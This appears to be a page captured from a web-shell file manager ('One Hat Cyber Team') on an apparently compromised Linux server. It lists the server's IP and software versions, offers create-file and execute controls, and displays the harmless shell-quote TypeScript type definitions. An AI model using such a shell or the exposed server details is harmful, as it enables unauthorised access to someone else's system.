⚝
One Hat Cyber Team
⚝
Your IP:
172.22.0.1
Server IP:
151.80.20.34
Server:
Linux 794f04d97d5e 5.15.0-143-generic #153-Ubuntu SMP Fri Jun 13 19:10:45 UTC 2025 x86_64
Server Software:
Apache/2.4.62 (Debian)
PHP Version:
8.2.28
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
nodejs
/
@types
/
shell-quote
/
View File Name :
index.d.ts
// Type definitions for shell-quote 1.7 // Project: https://github.com/substack/node-shell-quote // Definitions by: Jason Cheatham <https://github.com/jason0x43> // Cameron Diver <https://github.com/CameronDiver> // Opportunity Liu <https://github.com/OpportunityLiu> // Definitions: https://github.com/DefinitelyTyped/DefinitelyTyped // TypeScript Version: 2.2 export type ControlOperator = '||' | '&&' | ';;' | '|&' | '<(' | '>>' | '>&' | '&' | ';' | '(' | ')' | '|' | '<' | '>'; export type ParseEntry = | string | { op: ControlOperator } | { op: 'glob'; pattern: string } | { comment: string }; export interface ParseOptions { /** * Custom escape character, default value is `\` */ escape?: string | undefined; } /** * Return a quoted string for the array `args` suitable for using in shell commands. */ export function quote(args: ReadonlyArray<string>): string; /** * Return an array of arguments from the quoted string `cmd`. * * Interpolate embedded bash-style `$VARNAME` and `${VARNAME}` variables with the `env` object which like bash will replace undefined variables with `""`. */ export function parse( cmd: string, env?: { readonly [key: string]: string | undefined }, opts?: ParseOptions, ): ParseEntry[]; /** * Return an array of arguments from the quoted string `cmd`. * * Interpolate embedded bash-style `$VARNAME` and `${VARNAME}` variables * with the `env` object which like bash will replace undefined variables with `""`. * * @param env * A function to perform lookups. * When env(key) returns a string, its result will be output just like env[key] would. * When env(key) returns an object, it will be inserted into the result array like the operator objects. */ export function parse<T extends object | string>( cmd: string, env: (key: string) => T | undefined, opts?: ParseOptions, ): Array<ParseEntry | T>;